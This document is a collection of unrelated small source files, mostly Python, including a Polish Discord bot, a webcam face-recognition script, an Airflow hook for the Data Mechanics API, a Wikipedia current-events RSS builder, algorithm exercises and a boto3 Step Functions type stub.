with open(filepath, 'r', encoding='UTF-8') as tekst:
    logging.info('otwieram plik z tekstem')
    # Rebind `tekst` to the file's contents (shadows the file handle).
    tekst = tekst.read()
    # print(tekst)
client = discord.Client()
def czy_pyta_o_fale(message: str) -> None or re.match:
    """Return a regex match when *message* asks about waves, otherwise None.

    A message qualifies when it contains a question mark and mentions
    'fal'/'fale' (case-insensitive).
    """
    logging.info('funkcja czy_pyta_o_fale wywolana')
    logging.info('z argumentem {}'.format(message))
    # No question mark -> not a question at all.
    if re.search(r'\?', message) is None:
        logging.debug('nie zawiera znaku zapytania')
        return None
    # Does it mention waves?
    match = re.search(r'(fale)|(fal)', message, re.IGNORECASE)
    if match is None:
        logging.debug('nie zawiera fale, fal')
        return None
    return match
def odpowiedz_pyt_o_fale() -> str:
    """Return one randomly chosen canned answer about the waves."""
    logging.info('wybieram losowo z odpowiedzi["py_o_fale"]')
    pool = odpowiedzi['pyt_o_fale']
    return str(random.choice(pool))
@client.event
async def on_message(message):
    """Dispatch chat commands and wave questions to their replies."""
    # we do not want the bot to reply to itself
    if message.author == client.user:
        return
    if message.content.startswith('!help'):
        msg = '!tekst - wypisuje tekst\nSpróbuj też zapytać o fale!'
    elif message.content.startswith('!hello'):
        msg = 'Elo {0.author.mention}'.format(message)
    elif message.content.startswith('!tekst'):
        # `tekst` is the module-level contents of static/tekst.txt.
        msg = tekst
    elif czy_pyta_o_fale(message.content):
        msg = odpowiedz_pyt_o_fale()
    else:
        # Unrecognised message: stay silent.
        return
    await client.send_message(message.channel, msg)
@client.event
async def on_ready():
    """Log and print the bot identity once the connection is established."""
    login_info = 'Logged in as {}, id: {}\n---------'.format(
        client.user.name, client.user.id)
    logging.info(login_info)
    print(login_info)
# Blocks here running the event loop until the bot is stopped.
client.run(DISCORD_TOKEN)
| true |
ab4d66f22f0032513e84adfd18121e099a962dd5 | Python | NeeruKumar/Face-Recognition | /Face-Recognition.py | UTF-8 | 3,467 | 3.046875 | 3 | [] | no_license |
import face_recognition
import os
import cv2
# Directories holding labelled reference faces and images to classify.
KNOWN_FACES_DIR = 'known'
UNKNOWN_FACES_DIR = 'unknown'
# Maximum face distance accepted by compare_faces as a match.
TOLERANCE = 0.6
FRAME_THICKNESS = 3
FONT_THICKNESS = 2
MODEL = 'cnn' # default: 'hog', other one can be 'cnn' - CUDA accelerated (if available) deep-learning pretrained model
# Webcam capture (device 0).
video=cv2.VideoCapture(0)
print('Loading known faces...')
known_faces = []
known_names = []
# Each image file in KNOWN_FACES_DIR provides one labelled face; the label
# is the file name without its extension.
for name in os.listdir(KNOWN_FACES_DIR):
    image = face_recognition.load_image_file(f'{KNOWN_FACES_DIR}/{name}')
    # face_encodings always returns a list of found faces; we take the first
    # face only (assuming exactly one face per reference image).
    encoding = face_recognition.face_encodings(image)[0]
    # Append encodings and name
    known_faces.append(encoding)
    known_names.append(name.split('.')[0])
print('Processing unknown faces...')
# Main loop: grab webcam frames and label every detected face.
while True:
    # NOTE(review): `ret` is ignored — a failed read would pass None onwards;
    # consider guarding on `ret` before processing the frame.
    ret, image=video.read()
    locations = face_recognition.face_locations(image)
    # Pass the known locations to face_encodings as the second argument so
    # it does not search for faces a second time (which would be slow).
    encodings = face_recognition.face_encodings(image, locations)
    print(f', found {len(encodings)} face(s)')
    for face_encoding, face_location in zip(encodings, locations):
        # compare_faces returns a list of True/False values in the order of
        # the passed known_faces (face_distance could be used as well).
        results = face_recognition.compare_faces(known_faces, face_encoding, TOLERANCE)
        # Order is preserved, so the index of the first True gives the label
        # of the first known face matching within the tolerance.
        match = None
        if True in results: # If at least one is true, get a name of first of found labels
            match = known_names[results.index(True)]
            print(f' - {match} from {results}')
        # Each location contains positions in order: top, right, bottom, left
        top_left = (face_location[3], face_location[0])
        bottom_right = (face_location[1], face_location[2])
        # Paint frame
        cv2.rectangle(image, top_left, bottom_right, (0,0,255), FRAME_THICKNESS)
        # Smaller, filled frame below the face for the name label: both
        # corners use the bottom coordinate, extended 22 pixels down.
        top_left = (face_location[3], face_location[2])
        bottom_right = (face_location[1], face_location[2] + 22)
        # Paint frame
        cv2.rectangle(image, top_left, bottom_right, (0,0,255), cv2.FILLED)
        # Write the name
        cv2.putText(image, match, (face_location[3] + 10, face_location[2] + 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (200, 200, 200), FONT_THICKNESS)
    # Show image
    cv2.imshow('', image)
    if cv2.waitKey(1) & 0xFF==ord('q'):
        break
| true |
935db5732104003b56e632df0bb853497ef6476e | Python | yu4060/test | /13.py | UTF-8 | 623 | 3.640625 | 4 | [] | no_license | #13. col1.txtとcol2.txtをマージ
# Task 13: merge col1.txt and col2.txt (produced in task 12) so each output
# line holds column 1 and column 2 separated by a tab.
# Verify the result with the `paste` command.
with open('col1.txt', "r") as f1:
    data1 = f1.read()
data1 = data1.split('\n') # drop the newlines that were written into col1
with open('col2.txt', "r") as f2:
    data2 = f2.read()
data2 = data2.split('\n')
with open('col.txt', "w") as f:
    for (a, b) in zip(data1, data2):
        f.write(a + '\t' + b + '\n')
# Check:
# paste col1.txt col2.txt
| true |
ab30f5a7d1d146c270266da2e7da6acc06e51a7e | Python | epicteller/epicteller | /epicteller/core/util/validator.py | UTF-8 | 476 | 2.5625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from typing import Optional
from email_validator import validate_email, EmailNotValidError
def parse_external_id_from_qq_email(email_str: str) -> Optional[str]:
    """Return the numeric QQ id from a ``<digits>@qq.com`` address, else None."""
    try:
        parsed = validate_email(email_str, check_deliverability=False)
    except EmailNotValidError:
        return None
    local_part = parsed.local_part
    assert isinstance(local_part, str)
    if parsed.domain == 'qq.com' and local_part.isdigit():
        return local_part
    return None
| true |
6a35b2ae29f69ed3d7b8599c5aa869c6d58f6147 | Python | candyer/leetcode | /2020 November LeetCoding Challenge/20_search.py | UTF-8 | 1,570 | 4.09375 | 4 | [] | no_license | # https://leetcode.com/explore/challenge/card/november-leetcoding-challenge/566/week-3-november-15th-november-21st/3537/
# Search in Rotated Sorted Array II
# Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.
# (i.e., [0,0,1,2,2,5,6] might become [2,5,6,0,0,1,2]).
# You are given a target value to search. If found in the array return true, otherwise return false.
# Example 1:
# Input: nums = [2,5,6,0,0,1,2], target = 0
# Output: true
# Example 2:
# Input: nums = [2,5,6,0,0,1,2], target = 3
# Output: false
# Follow up:
# This is a follow up problem to Search in Rotated Sorted Array, where nums may contain duplicates.
# Would this affect the run-time complexity? How and why?
from typing import List
def search(nums: List[int], target: int) -> bool:
    """Binary-search *target* in a rotated sorted list that may hold duplicates."""
    lo, hi = 0, len(nums) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        if nums[mid] == target:
            return True
        # Duplicates at the left edge make it impossible to tell which half
        # is sorted, so shrink past them first.
        while lo < mid and nums[lo] == nums[mid]:
            lo += 1
        if nums[lo] <= nums[mid]:
            # Left half nums[lo:mid] is sorted.
            if nums[lo] <= target < nums[mid]:
                hi = mid - 1
            else:
                lo = mid + 1
        else:
            # Right half nums[mid:hi] is sorted.
            if nums[mid] < target <= nums[hi]:
                lo = mid + 1
            else:
                hi = mid - 1
    return False
# Sanity checks from the problem statement (executed on import).
assert(search([1, 3, 1, 1, 1], 3) == True)
assert(search([2,5,6,0,0,1,2], 0) == True)
assert(search([2,5,6,0,0,1,2], 3) == False)
assert(search([2,5,6,0,0,1,2], 5) == True)
| true |
9d4e1b20b8aa4b1eac0397bc03bb17f6d3c76101 | Python | datamechanics/datamechanics_airflow_plugin | /datamechanics_airflow_plugin/hook.py | UTF-8 | 4,264 | 2.53125 | 3 | [
"Apache-2.0"
] | permissive | from airflow.hooks.base_hook import BaseHook
from airflow import __version__
from airflow.exceptions import AirflowException
from urllib.parse import urljoin
import requests
import time
from requests import exceptions as requests_exceptions
# (HTTP method, path) endpoint descriptors for the Data Mechanics REST API;
# the "{}" placeholder is filled with the application name.
SUBMIT_APP_ENDPOINT = ("POST", "api/apps/")
GET_APP_ENDPOINT = ("GET", "api/apps/{}")
DELETE_APP_ENDPOINT = ("DELETE", "api/apps/{}")
# Sent with every request so the API can identify the Airflow client version.
USER_AGENT_HEADER = {"user-agent": "airflow-{v}".format(v=__version__)}
class DataMechanicsHook(BaseHook):
    """Airflow hook wrapping the Data Mechanics REST API.

    Provides submit/get/delete application calls with retry handling.
    Host and API key come from the Airflow connection ``dm_conn_id``
    (the connection's password field holds the API key).
    """

    def __init__(
        self,
        dm_conn_id="datamechanics_default",
        timeout_seconds=180,
        retry_limit=3,
        retry_delay=1.0,
    ):
        """
        :param dm_conn_id: Airflow connection id holding host and API key.
        :param timeout_seconds: per-request timeout passed to requests.
        :param retry_limit: number of attempts before giving up (must be >= 1).
        :param retry_delay: seconds to sleep between attempts.
        """
        self.dm_conn_id = dm_conn_id
        self.dm_conn = self.get_connection(dm_conn_id)
        self.timeout_seconds = timeout_seconds
        if retry_limit < 1:
            raise ValueError("Retry limit must be greater than equal to 1")
        self.retry_limit = retry_limit
        self.retry_delay = retry_delay

    def _do_api_call(self, endpoint_info, payload=None):
        """
        Utility function to perform an API call with retries
        :param endpoint_info: Tuple of method and endpoint
        :type endpoint_info: tuple[string, string]
        :param payload: Parameters for this API call.
        :type payload: dict
        :return: If the api call returns a OK status code,
            this function returns the response in JSON. Otherwise,
            we throw an AirflowException.
        :rtype: dict
        """
        method, endpoint = endpoint_info
        api_key = self.dm_conn.password
        url = urljoin(self.dm_conn.host, endpoint)
        headers = {**USER_AGENT_HEADER, "X-API-Key": api_key}
        if method == "GET":
            request_func = requests.get
        elif method == "POST":
            request_func = requests.post
        elif method == "DELETE":
            request_func = requests.delete
        else:
            raise AirflowException("Unexpected HTTP Method: " + method)
        attempt_num = 1
        while True:
            try:
                response = request_func(
                    url, json=payload, headers=headers, timeout=self.timeout_seconds
                )
                response.raise_for_status()
                return response.json()
            except requests_exceptions.RequestException as e:
                if not _retryable_error(e):
                    # In this case, the user probably made a mistake.
                    # Don't retry.
                    # BUGFIX: e.response is None for errors that never got an
                    # HTTP response (e.g. an invalid URL); reading .content on
                    # None raised AttributeError and masked the real error.
                    if e.response is not None:
                        raise AirflowException(
                            "Response: {0}, Status Code: {1}".format(
                                e.response.content, e.response.status_code
                            )
                        )
                    raise AirflowException("Request failed: {0}".format(e))
                self._log_request_error(attempt_num, e)
                if attempt_num == self.retry_limit:
                    raise AirflowException(
                        (
                            "API requests to Data Mechanics failed {} times. "
                            + "Giving up."
                        ).format(self.retry_limit)
                    )
                attempt_num += 1
                time.sleep(self.retry_delay)

    def _log_request_error(self, attempt_num, error):
        """Log a single failed attempt through the hook's logger."""
        self.log.error(
            "Attempt %s API Request to Data Mechanics failed with reason: %s",
            attempt_num,
            error,
        )

    def submit_app(self, payload):
        """Submit a new application; returns the generated app name."""
        response = self._do_api_call(SUBMIT_APP_ENDPOINT, payload)
        return response["appName"]

    def get_app(self, app_name):
        """Fetch the full JSON description of an application."""
        method, path = GET_APP_ENDPOINT
        filled_endpoint = (method, path.format(app_name))
        response = self._do_api_call(filled_endpoint)
        return response

    def kill_app(self, app_name):
        """Delete (kill) an application by name."""
        method, path = DELETE_APP_ENDPOINT
        filled_endpoint = (method, path.format(app_name))
        response = self._do_api_call(filled_endpoint)
        return response

    def get_app_page_url(self, app_name):
        """Return the dashboard page URL for *app_name*."""
        return urljoin(self.dm_conn.host, "dashboard/apps/{}".format(app_name))
def _retryable_error(exception):
    """Retry on connection problems, timeouts, and 5xx server responses."""
    if isinstance(exception, (requests_exceptions.ConnectionError, requests_exceptions.Timeout)):
        return True
    response = exception.response
    return response is not None and response.status_code >= 500
| true |
e589e804a49b1fec0adff8140832df2a4e298ee9 | Python | giovannyortegon/holbertonschool-machine_learning | /supervised_learning/0x03-optimization/14-batch_norm.py | UTF-8 | 1,099 | 2.859375 | 3 | [] | no_license | #!/usr/bin/env python3
""" batch normalization """
import tensorflow as tf
def create_batch_norm_layer(prev, n, activation):
    """ create_batch_norm_layer
    Args:
        prev is the activated output of the previous layer
        n is the number of nodes in the layer to be created
        activation is the activation function that should be
                   used on the output of the layer.
    Return:
        a tensor of the activated output for the layer
    """
    # Variance-scaling ("He"-style) initialisation averaged over fan-in/out.
    init = tf.contrib.layers.variance_scaling_initializer(mode="FAN_AVG")
    hidden = tf.layers.Dense(
        units=n,
        kernel_initializer=init
    )
    # Pre-activation linear output of the new layer.
    Z = hidden(prev)
    # Small constant to avoid division by zero in the normalization.
    epsilon = 1e-8
    # Trainable shift (beta, starts at 0) and scale (gamma, starts at 1),
    # one value per node.
    beta = tf.Variable(
        tf.constant(0.0, shape=[n]),
        name="beta",
        trainable=True
    )
    gamma = tf.Variable(
        tf.constant(1.0, shape=[n]),
        name="gamma",
        trainable=True
    )
    # Batch statistics taken over axis 0 (the batch dimension).
    mean, var = tf.nn.moments(Z, axes=[0])
    Z_hat = tf.nn.batch_normalization(Z, mean, var, beta, gamma, epsilon)
    if activation is None:
        return Z_hat
    return activation(Z_hat)
| true |
92f5540e2ff232f2ff6bb2e49b4ecef13ae91c11 | Python | Siddhantham/pythonAssg | /20 integer inputs.py | UTF-8 | 176 | 3.453125 | 3 | [] | no_license | a = 20
# Read 20 integers from stdin, then print the multiples of 3 in
# descending order.
lis = []
for _ in range(a):
    if len(lis) != 20:
        lis.append(int(input()))
lis.sort(reverse=True)
for value in lis:
    if value % 3 == 0:
        print(value)
b60d3fa8ecc3fa307b778114f36b7dfac15809c8 | Python | clokep/wp-current-events-rss | /parser.py | UTF-8 | 10,002 | 2.6875 | 3 | [] | no_license | from datetime import date, datetime, timedelta
from urllib.parse import quote as url_quote
import feedgenerator
import mwparserfromhell
from mwparserfromhell.definitions import MARKUP_TO_HTML
from mwparserfromhell.nodes import Comment, ExternalLink, HTMLEntity, Tag, Template, Text, Wikilink
from mwparserfromhell.wikicode import Wikicode
import requests
# The MARKUP_TO_HTML is missing a few things...this duck punches them in.
MARKUP_TO_HTML.update({
"''": 'i',
})
class UnknownNode(Exception):
    """Raised when the composer meets a Wikicode node type it cannot render."""
    pass
class HtmlComposingError(Exception):
    """Raised when the HTML tag stack cannot be unwound as requested."""
    pass
class WikicodeToHtmlComposer(object):
    """
    Format HTML from Parsed Wikicode.
    Note that this is not currently re-usable.
    https://en.wikipedia.org/wiki/Help:Wiki_markup
    """
    def __init__(self, base_url='https://en.wikipedia.org/wiki'):
        # The base URL should be the root that articles sit in.
        self._base_url = base_url.rstrip('/')
        # List kinds ('ul'/'ol'/'dl') requested by markup but not yet opened.
        self._wanted_lists = []
        # Track the currently open tags.
        self._stack = []
    def _get_url(self, title):
        """Given a page title, return a URL suitable for linking."""
        safe_title = url_quote(title.encode('utf-8'))
        return '{}/{}'.format(self._base_url, safe_title)
    def _close_stack(self, tag=None, raise_on_missing=True):
        """Close tags that are on the stack. It closes all tags until ``tag`` is found.
        If no tag to close is given the entire stack is closed.
        """
        # Close the entire stack.
        if tag is None:
            for current_tag in reversed(self._stack):
                yield u'</{}>'.format(current_tag)
            return
        # If a tag was given, close all tags behind it (in reverse order).
        if tag not in self._stack:
            # TODO
            if raise_on_missing:
                raise HtmlComposingError('Unable to close given tags.')
            else:
                return
        while len(self._stack):
            current_tag = self._stack.pop()
            yield u'</{}>'.format(current_tag)
            if current_tag == tag:
                break
    def _add_part(self, part):
        """Append a part, closing any parts of the stack that should be closed here."""
        if self._wanted_lists:
            stack_lists = [node for node in self._stack if node in ['ul', 'ol', 'dl']]
            # Remove the prefixed part of the lists that match.
            i = 0
            shortest = min([len(stack_lists), len(self._wanted_lists)])
            for i in range(shortest):
                if stack_lists[i] != self._wanted_lists[i]:
                    break
            else:
                # Loop ran to completion: the entire shorter prefix matches.
                i = shortest
            # Now close anything left in stack_lists.
            for node in reversed(stack_lists[i:]):
                yield from self._close_stack(node)
            # Open anything in wanted_lists.
            for node in self._wanted_lists[i:]:
                self._stack.append(node)
                yield u'<{}>'.format(node)
            # Finally, open the list item.
            if self._wanted_lists[-1] == 'dl':
                item_tag = 'dt'
            else:
                item_tag = 'li'
            self._stack.append(item_tag)
            yield u'<{}>'.format(item_tag)
            # Reset the list.
            self._wanted_lists = []
        yield part
        # Certain tags get closed when there's a line break.
        if self._stack:
            # Walk the trailing characters of `part`; each trailing newline
            # may close one open list-related element.
            for c in reversed(part):
                if c == '\n':
                    elements_to_close = ['li', 'ul', 'ol', 'dl', 'dt']
                    # Close an element in the stack.
                    if self._stack[-1] in elements_to_close:
                        yield from self._close_stack(self._stack[-1])
                else:
                    break
    def _compose_parts(self, obj):
        """Takes an object and returns a generator that will compose one more pieces of HTML."""
        if isinstance(obj, Wikicode):
            for node in obj.ifilter(recursive=False):
                yield from self._compose_parts(node)
        elif isinstance(obj, Tag):
            # Some tags require a parent tag to be open first, but get grouped
            # if one is already open.
            if obj.wiki_markup == '*':
                self._wanted_lists.append('ul')
                # Don't allow a ul inside of a dl.
                yield from self._close_stack('dl', raise_on_missing=False)
            elif obj.wiki_markup == '#':
                self._wanted_lists.append('ol')
                # Don't allow a ul inside of a dl.
                yield from self._close_stack('dl', raise_on_missing=False)
            elif obj.wiki_markup == ';':
                self._wanted_lists.append('dl')
                # Don't allow dl instead ol or ul.
                yield from self._close_stack('ol', raise_on_missing=False)
                yield from self._close_stack('ul', raise_on_missing=False)
            else:
                # Create an HTML tag.
                # TODO Handle attributes.
                yield from self._add_part(u'<{}>'.format(obj.tag))
                self._stack.append(obj.tag)
            for child in obj.__children__():
                yield from self._compose_parts(child)
            # Self closing tags don't need an end tag, this produces "broken"
            # HTML, but readers should handle it fine.
            if not obj.self_closing:
                # Close this tag and any other open tags after it.
                yield from self._close_stack(obj.tag)
        elif isinstance(obj, Wikilink):
            # Different text can be specified, or falls back to the title.
            text = obj.text or obj.title
            url = self._get_url(obj.title)
            yield from self._add_part(u'<a href="{}">'.format(url))
            yield from self._compose_parts(text)
            yield from self._add_part(u'</a>')
        elif isinstance(obj, ExternalLink):
            # Different text can be specified, or falls back to the URL.
            text = obj.title or obj.url
            yield from self._add_part(u'<a href="{}">'.format(obj.url))
            yield from self._compose_parts(text)
            yield from self._add_part(u'</a>')
        elif isinstance(obj, Comment):
            yield from self._add_part(u'<!-- {} -->'.format(obj.contents))
        elif isinstance(obj, Text):
            yield from self._add_part(obj.value)
        elif isinstance(obj, (HTMLEntity, Template)):
            # TODO
            yield from self._add_part(str(obj))
        elif isinstance(obj, (list, tuple)):
            # If the object is iterable, just handle each item separately.
            for node in obj:
                yield from self._compose_parts(node)
        else:
            raise UnknownNode(u'Unknown node type: {}'.format(type(obj)))
    def compose(self, obj):
        """Converts Wikicode or Node objects to HTML."""
        # TODO Add a guard that this can only be called once at a time.
        return u''.join(self._compose_parts(obj)) + u''.join(self._close_stack())
def filter_templates(node):
    """Keep every node that is not a Template (used as a Wikicode filter)."""
    return not isinstance(node, Template)
def get_article_url(lookup_date):
    """Return the "Portal:Current events" subpage URL for *lookup_date*.

    Daily subpages are named with MediaWiki's ``#time`` format "Y F j"
    (https://www.mediawiki.org/wiki/Help:Extension:ParserFunctions#.23time):
    the month as its English name and the day *not* zero padded.
    """
    parts = [str(lookup_date.year), lookup_date.strftime('%B'), str(lookup_date.day)]
    return 'https://en.wikipedia.org/wiki/Portal:Current_events/' + ' '.join(parts)
def get_article_by_date(lookup_date):
    """
    Returns the article content for a particular day, this requests a page like
    https://en.wikipedia.org/wiki/Portal:Current_events/2017_May_5
    """
    url = get_article_url(lookup_date)
    # action=raw returns the raw wiki markup instead of rendered HTML.
    return requests.get(url, params={'action': 'raw'}).content
def get_articles():
    """Build and return an RSS feed (UTF-8 XML string) for the past 7 days.

    Each day's current-events page is downloaded (see get_article_by_date),
    trimmed to the nodes between the "All news items below/above this line"
    comments, rendered to HTML, and added as one feed item.
    """
    feed = feedgenerator.Rss201rev2Feed('Wikipedia: Portal: Current events',
                                       'https://en.wikipedia.org/wiki/Portal:Current_events',
                                       'Wikipedia: Portal: Current events')
    # Start at today.
    day = date.today()
    for i in range(7):
        day -= timedelta(days=1)
        # Download the article content.
        article = get_article_by_date(day)
        # Parse the article contents.
        wikicode = mwparserfromhell.parse(article)
        nodes = wikicode.filter(recursive=False, matches=filter_templates)
        # Remove all nodes before / after the start / end comments.
        start = 0
        end = len(nodes) - 1
        # NOTE(review): this inner loop reuses the outer loop variable `i`;
        # harmless here (the outer `i` is otherwise unused) but worth renaming.
        for i, node in enumerate(nodes):
            if isinstance(node, Comment):
                if 'All news items below this line' in node:
                    start = i + 1
                elif 'All news items above this line' in node:
                    end = i
                    break
        # Ignore nodes outside of the start/end.
        nodes = nodes[start:end]
        # A fresh composer per day: the composer keeps tag-stack state and is
        # not reusable (see WikicodeToHtmlComposer's docstring).
        composer = WikicodeToHtmlComposer()
        try:
            feed.add_item(title=u'Current events: {}'.format(day),
                          link=get_article_url(day),
                          description=composer.compose(nodes),
                          pubdate=datetime(*day.timetuple()[:3]))
        except HtmlComposingError:
            print("Unable to render article from: {}".format(day))
    return feed.writeString('utf-8')
if __name__ == '__main__':
    # NOTE(review): the returned RSS string is discarded here — presumably it
    # should be printed or written to a file; confirm intended behaviour.
    get_articles()
| true |
60e708849612f1b3d3791a434eb1ebb79052785d | Python | theerawatramchuen/dogDetector | /dogDet.py | UTF-8 | 2,020 | 3.15625 | 3 | [] | no_license |
# Importing the Keras libraries and packages
from keras.models import Sequential
from keras.layers import Convolution2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers import Dense
from keras.models import load_model
# Part 1 - Build the CNN (architecture must match the saved weights below).
classifier = Sequential()
# Step 1 - Convolution: 32 3x3 filters over 64x64 RGB input.
classifier.add(Convolution2D(32, 3, 3, input_shape = (64, 64, 3), activation = 'relu'))
# Step 2 - Pooling
classifier.add(MaxPooling2D(pool_size = (2, 2)))
# Adding a second convolutional layer
classifier.add(Convolution2D(32, 3, 3, activation = 'relu'))
classifier.add(MaxPooling2D(pool_size = (2, 2)))
# Step 3 - Flattening
classifier.add(Flatten())
# Step 4 - Full connection; single sigmoid output for the binary
# GOOD/REJECT decision used in the prediction loop below.
classifier.add(Dense(output_dim = 128, activation = 'relu'))
classifier.add(Dense(output_dim = 1, activation = 'sigmoid'))
# Compiling the CNN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Part 2 - Load pre-trained weights (file must sit in the working directory).
classifier.load_weights('EBS-Eval-bs16-ep200.h5')
# Part 3 Prediction Image from video
import numpy as np
from keras.preprocessing import image as image_utils
import time
import numpy as np
import cv2
# Part 3 - Grab frames from the default webcam and classify each one.
cap = cv2.VideoCapture(0)
while(cap.isOpened()):
    start = time.time()
    ret, frame = cap.read()
    if ret == True:
        cv2.imshow('frame',frame)
        # Round-trip through a temp file so Keras' image loader handles the
        # resize to the model's 64x64 input.
        cv2.imwrite('temp.jpg',frame)
        test_image = image_utils.load_img('temp.jpg', target_size = (64, 64))
        test_image = image_utils.img_to_array(test_image)
        # Add the batch dimension expected by predict_on_batch.
        test_image = np.expand_dims(test_image, axis = 0)
        result = classifier.predict_on_batch(test_image)
        if result[0][0] == 1:
            prediction = 'REJECT'
        else:
            prediction = 'GOOD'
        end = time.time()
        print ('I guess it is... ',prediction,' by ',round((end - start)*1000),' miliSeconds')
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    else:
        break
cap.release()
# BUGFIX: destroyAllWindows must be *called* — the bare attribute reference
# was a no-op and left the preview window open.
cv2.destroyAllWindows()
| true |
beb8e8da9663b2c8cd84210d4c99ef922522d5a1 | Python | jonathanlebron/solving-puzzles | /circular_primes.py | UTF-8 | 1,632 | 4.09375 | 4 | [
"MIT"
] | permissive | # Description:
# The number, 197, is called a circular prime because
# all rotations of the digits: 197, 971, and 719, are
# themselves prime.
# There are thirteen such primes below 100:
# 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.
#
# How many circular primes are there below one million?
#
# - From http://projecteuler.net/problem=35
''' SIEVE OF ERATOSTHENES '''
# Author: Jonathan Lebron (Github: jonathanlebron, Twitter: _jlebron)
# Date: 11/8/2013
import math, time
# NOTE: Python 2 code (xrange, print statements, time.clock).
start = time.clock()
# NOTE(review): the problem statement above asks for primes below one
# million, but the search bound here is 100000 — presumably reduced for
# speed; confirm which bound is intended.
num = 100000
primes = [True]*num
primes[0] = False
primes[1] = False
# Generate list of primes
m = int(math.sqrt(num))+1
for i in xrange(2, m):
    if primes[i]:
        # if number is prime, set all multiples to 0
        # and subtract from total
        for j in xrange(i*2, num, i):
            if primes[j]:
                primes[j] = False
count = 0
# `seen` remembers rotations already examined so each rotation cycle is
# processed only once; numRotations credits the whole cycle up front.
seen = {}
for i in xrange(2,num):
    if primes[i] and i not in seen:
        currNum = str(i)
        isCircularPrime = True # assume it is a circular prime
        numRotations = 1
        # iterate through each rotation and check if it is prime
        for j in xrange(1,len(currNum)):
            currRotation = currNum[j:]+currNum[:j]
            currInt = int(currRotation)
            if currInt != i:
                numRotations += 1
                seen[currInt] = True
                if not primes[currInt]:
                    isCircularPrime = False
                    break
        if isCircularPrime:
            count += numRotations
end = time.clock() - start
print "answer is: ", count
print "took ", end, " seconds"
''' END SIEVE OF ERATOSTHENES '''
| true |
8def003e91ac8e6235d5b0d4f5d4c898b14b48d2 | Python | chenxingyuoo/learn | /python_learn/廖雪峰python/16.网络编程/tpc_client.py | UTF-8 | 485 | 2.984375 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
# 服务器地址(主机,端口)
address = ('127.0.0.1', 9999)
# 初始化socket
s = socket.socket()
# 连接服务器
print('【开始连接服务器 %s:%s】' % address)
s.connect(address)
while True:
print('Server: %s' % s.recv(1024).decode('utf-8'))
msg = input('Client: ')
if not msg or msg == 'exit':
break
s.send(msg.encode('utf-8'))
# 断开连接
s.close()
print('【断开连接】') | true |
7150ddc22de19c993622d22c39f168b70ba1e165 | Python | jiuzhou18/PythonPractise | /unicode.py | UTF-8 | 238 | 2.9375 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
print('ABC'.encode('ascii'), "\n", b'\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8'));
print(len('中文'), " " ,chr(25991));
s1 = 72
s2 = 85
r = s2/s1 -1
print('The growth rate is %.1f %%' %( r)) | true |
9ff2c3e438a052155426fb1df7b6bdade94595d1 | Python | mgvaldes/miri-od-project2016 | /foursquare/foursquare_example.py | UTF-8 | 1,423 | 2.765625 | 3 | [] | no_license | # import pyfoursquare as foursquare
# # == OAuth2 Authentication ==
# #
# # This mode of authentication is the required one for Foursquare
#
# # The client id and client secret can be found on your application's Details
# # page located at https://foursquare.com/oauth/
# client_id = "YOUR_CLIENT_ID" # NOTE(review): a real-looking client id was committed here -- rotate it
# client_secret = "YOUR_CLIENT_SECRET" # NOTE(review): a real-looking secret was committed here -- revoke and rotate it
# callback = 'http://localhost:8080/'
#
# auth = foursquare.OAuthHandler(client_id, client_secret, callback)
#
# #First Redirect the user who wish to authenticate to.
# #It will be create the authorization url for your app
# auth_url = auth.get_authorization_url()
# print 'Please authorize: ' + auth_url
#
# #If the user accepts, it will be redirected back
# #to your registered REDIRECT_URI.
# #It will give you a code as
# #https://YOUR_REGISTERED_REDIRECT_URI/?code=CODE
# code = raw_input('The code: ').strip()
#
# #Now your server will make a request for
# #the access token. You can save this
# #for future access for your app for this user
# access_token = auth.get_access_token(code)
# print 'Your access token is ' + access_token
#
# #Now let's create an API
# api = foursquare.API(auth)
#
# #Now you can access the Foursquare API!
# result = api.venues_search(query='Burburinho', ll='-8.063542,-34.872891')
#
# #You can acess as a Model
# print dir(result[0])
#
# #Access all its attributes
# print result[0].name
#
# # access token = <REDACTED>  # NOTE(review): never commit real access tokens; revoke this one
5c1d0625286c2ea95e0a120a147b3214399feddd | Python | alliefitter/boto3_type_annotations | /boto3_type_annotations_with_docs/boto3_type_annotations/stepfunctions/client.py | UTF-8 | 68,286 | 2.984375 | 3 | [
"MIT"
] | permissive | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def create_activity(self, name: str, tags: List = None) -> Dict:
"""
Creates an activity. An activity is a task that you write in any programming language and host on any machine that has access to AWS Step Functions. Activities must poll Step Functions using the ``GetActivityTask`` API action and respond using ``SendTask*`` API actions. This function lets Step Functions know the existence of your activity and returns an identifier for use in a state machine and when polling from the activity.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/CreateActivity>`_
**Request Syntax**
::
response = client.create_activity(
name='string',
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
**Response Syntax**
::
{
'activityArn': 'string',
'creationDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **activityArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the created activity.
- **creationDate** *(datetime) --*
The date the activity is created.
:type name: string
:param name: **[REQUIRED]**
